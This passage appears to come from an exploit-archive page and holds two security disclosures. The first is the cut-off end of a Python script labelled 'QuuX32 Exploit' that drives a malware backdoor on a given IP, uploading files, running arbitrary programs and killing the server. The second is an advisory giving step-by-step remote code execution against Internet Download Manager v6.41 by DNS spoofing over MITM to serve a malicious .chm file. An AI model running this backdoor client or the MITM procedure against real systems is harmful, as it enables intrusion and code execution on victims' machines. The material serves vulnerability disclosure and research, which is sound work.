s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /><br /> PAYLOAD="Exec"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> <br /> PAYLOAD=the_file<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> print("[+] Uploading: "+the_file)<br /> <br /> time.sleep(2)<br /> s.close()<br /><br />def isIP(ip):<br /> try:<br /> inet_aton(ip)<br /> return True<br /> except Exception as e:<br /> return False<br /><br />def execute(program):<br /><br /> s = auth()<br /> PAYLOAD="Exec"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /><br /> PAYLOAD=program<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> print("[+] Executing: "+program)<br /><br />def kill_srv():<br /><br /> s = auth()<br /> print(chk_res(s))<br /> PAYLOAD="die"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print("[+] Backdoor terminated!")<br /><br /> <br />if __name__=="__main__":<br /> print(BANNER)<br /> if len(sys.argv) == 3:<br /> MALWARE_HOST=sys.argv[1]<br /> CMD = sys.argv[2]<br /> if isIP(MALWARE_HOST):<br /> if CMD=="1":<br /> _file=input("[-] File to upload: > ")<br /> if _file:<br /> upload(_file)<br /> else:<br /> exit(1)<br /> elif CMD=="2":<br /> pgm=input("[-] Program to run: > ")<br /> if pgm:<br /> execute(pgm)<br /> else:<br /> exit(1)<br /> elif CMD=="3":<br /> choice=input("[-] Kill server? 1=Yes > ")<br /> if choice.lower()=="1":<br /> kill_srv()<br /> else:<br /> print("[!] Invalid IP!")<br /> exit(1)<br /> else:<br /> print("[*] QuuX32 Exploit Usage: \n[-]IP: x.x.x.x, Command (1=Upload file, 2=Exec program, 3=Kill server)")<br /> exit(1)<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Vulnerability Title: Internet Download Manager v6.41 Build 3 "Remote Code Execution via MITM" Vulnerability<br /># Date: 15.11.2022<br /># Author: M. Akil Gündoğan <br /># Contact: https://twitter.com/akilgundogan<br /># Vendor Homepage: https://www.internetdownloadmanager.com/<br /># Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe<br /># Version: v.6.41 Build 3<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/0djlanUbfY4<br /><br />Vulnerabiliy Description: <br />---------------------------------------<br />Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension <br />".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is <br />done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and <br />replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading. <br />This allows the attacker to execute code remotely. <br /><br />It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system.<br /><br />Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".<br /><br />Requirements: <br />---------------------------------------<br />The attacker and the victim must be on the same local network.<br />The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges!<br /><br />Step by step produce:<br />---------------------------------------<br />1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that.<br />2 - A MITM attack is made against the target using Ettercap or Bettercap.<br />3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing.<br />4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the <br /> same name (tut_tr.chm / the file according to which language you are using.) is placed in it.<br />5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished.<br /><br />Advisories:<br />---------------------------------------<br />Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file <br />should not be run automatically, additional warning messages should be displayed for users.<br /><br />Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends. <br />---------------------------------------<br /></code></pre>